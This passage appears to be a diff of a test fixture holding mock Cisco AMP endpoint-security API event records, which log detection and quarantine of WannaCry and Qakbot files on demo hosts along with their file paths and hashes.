Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} \ No newline at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 